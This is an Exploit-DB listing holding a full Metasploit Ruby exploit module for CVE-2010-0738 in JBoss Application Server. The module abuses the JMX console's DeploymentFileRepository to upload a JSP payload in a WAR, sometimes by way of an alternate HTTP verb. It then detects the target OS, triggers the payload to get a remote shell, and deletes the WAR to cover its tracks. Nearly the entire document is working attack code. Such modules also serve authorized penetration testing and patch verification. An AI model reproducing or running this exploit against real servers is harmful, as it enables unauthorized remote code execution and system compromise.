JBoss Java Class DeploymentFileRepository WAR deployment

2010-08-03T00:00:00
ID EDB-ID:16316
Type exploitdb
Reporter metasploit
Modified 2010-08-03T00:00:00

Description

JBoss Java Class DeploymentFileRepository WAR deployment. CVE-2010-0738. Remote exploits for multiple platform

                                        
                                            ##
# $Id: jboss_deploymentfilerepository.rb 9950 2010-08-03 15:14:34Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'JBoss Java Class DeploymentFileRepository WAR deployment',
			'Description' => %q{
					This module uses the DeploymentFileRepository class in
				JBoss Application Server (jbossas) to deploy a JSP file
				in a minimal WAR context.
			},
			'Author'      => [ 'MC', 'Jacob Giannantonio', 'Patrick Hof' ],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision: 9950 $',
			'References'  =>
				[
					[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
					[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ]
				],
			'Privileged'  => false,
			'Platform'    => ['linux', 'windows' ],
			'Targets'     =>
				[
					[ 'Universal',
						{
							'Arch' => ARCH_JAVA,
							'Payload' =>
								{
									'DisableNops' => true,
								},
						}
					],
				],
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(8080),
				OptString.new('SHELL', [ true, "The system shell to use.", 'automatic']),
				OptString.new('JSP',   [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),
				OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),
				OptString.new('PATH',  [ true,  'The URI path of the JMX console', '/jmx-console' ]),
				OptString.new('VERB',  [ true, "The HTTP verb to use", "POST"]),
			], self.class)
	end

	def exploit
		jsp_name = datastore['JSP'] || rand_text_alphanumeric(8+rand(8))
		app_base = datastore['APPBASE'] || rand_text_alphanumeric(8+rand(8))

		p = payload
		if datastore['SHELL'] == 'automatic'
			if not (plat = detect_platform())
				raise RuntimeError, 'Unable to detect platform!'
			end

			case plat
			when 'linux'
				datastore['SHELL'] = '/bin/sh'
			when 'win'
				datastore['SHELL'] = 'cmd.exe'
			end

			print_status("SHELL set to #{datastore['SHELL']}")

			return if ((p = exploit_regenerate_payload(plat, target_arch)) == nil)
		end


		#
		# UPLOAD
		#
		data =  'action=invokeOpByName'
		data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
		data << '&methodName=store'
		data << '&argType=java.lang.String'
		data << '&arg0=' + Rex::Text.uri_encode(app_base) + '.war'
		data << '&argType=java.lang.String'
		data << '&arg1=' + jsp_name
		data << '&argType=java.lang.String'
		data << '&arg2=.jsp'
		data << '&argType=java.lang.String'
		data << '&arg3=' + Rex::Text.uri_encode(p.encoded)
		data << '&argType=boolean'
		data << '&arg4=True'

		if (datastore['VERB'] == "POST")
			res = send_request_cgi(
				{
					'uri'    => datastore['PATH'] + '/HtmlAdaptor',
					'method' => datastore['VERB'],
					'data'   => data
				}, 5)
		else
			res = send_request_cgi(
				{
					'uri'    =>  datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
					'method' => datastore['VERB'],
				}, 5)
		end

		#
		# EXECUTE
		#
		# Using HEAD may trigger a 500 Internal Server Error (at leat on 4.2.3.GA),
		# but the file still gets written.
		if (res.code == 200 || res.code == 500)
			uri = '/' + app_base + '/' + jsp_name + '.jsp'
			print_status("Triggering payload at '#{uri}'...")
			verb = 'GET'
			if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
				verb = 'HEAD'
			end
			# JBoss might need some time for the deployment. Try 5 times at most
			# and sleep 3 seconds in between.
			5.times do
				res = send_request_raw(
					{
						'uri'    => uri,
						'method' => verb,
					})
				if !res
					print_error("Execution failed on '#{uri}' [No Response], retrying...")
					select(nil,nil,nil,3)
				elsif (res.code < 200 or res.code >= 300)
					print_error("Execution failed on '#{uri}' [#{res.code} #{res.message}], retrying...")
					select(nil,nil,nil,3)
				elsif res.code == 200
					print_status("Successfully triggered payload at '#{uri}'.")
					break
				else
					print_error("Denied...")
				end
			end

			#
			# DELETE
			#
			# The WAR can only be removed by physically deleting it, otherwise it
			# will get redeployed after a server restart.
			print_status("Undeploying #{uri} by deleting the WAR file via DeploymentFileRepository.remove()...")
			res1 = delete_file(Rex::Text.uri_encode(app_base) + '.war', jsp_name, '.jsp')
			res2 = delete_file('./', Rex::Text.uri_encode(app_base) + '.war', '')
			[res1, res2].each do |res|
				if !res
					print_error("WARNING: Unable to remove WAR [No Response]")
				end
				if (res.code < 200 || res.code >= 300)
					print_error("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
				end
			end

			handler
		end
	end

	# Delete a file with DeploymentFileRepository.remove().
	def delete_file(folder, name, ext)
		data =  'action=invokeOpByName'
		data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
		data << '&methodName=remove'
		data << '&argType=java.lang.String'
		data << '&arg0=' + folder
		data << '&argType=java.lang.String'
		data << '&arg1=' + name
		data << '&argType=java.lang.String'
		data << '&arg2=' + ext

		if (datastore['VERB'] == "POST")
			res = send_request_cgi(
				{
					'uri'    => datastore['PATH'] + '/HtmlAdaptor',
					'method' => datastore['VERB'],
					'data'   => data
				}, 5)
		else
			res = send_request_cgi(
				{
					'uri'    =>  datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
					'method' => datastore['VERB'],
				}, 5)
		end
		res
	end

	def detect_platform
		print_status("Attempting to automatically detect the platform...")
		path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
		res = send_request_raw(
			{
				'uri' => path,
			}, 20)

		if (not res) or (res.code != 200)
			print_error("Failed: Error requesting #{path}")
			return nil
		end

		if (res.body =~ /<td.*?OSName.*?(Linux|Windows).*?<\/td>/m)
			os = $1
			if (os =~ /Linux/i)
				return 'linux'
			elsif (os =~ /Windows/i)
				return 'win'
			end
		end
		nil
	end
end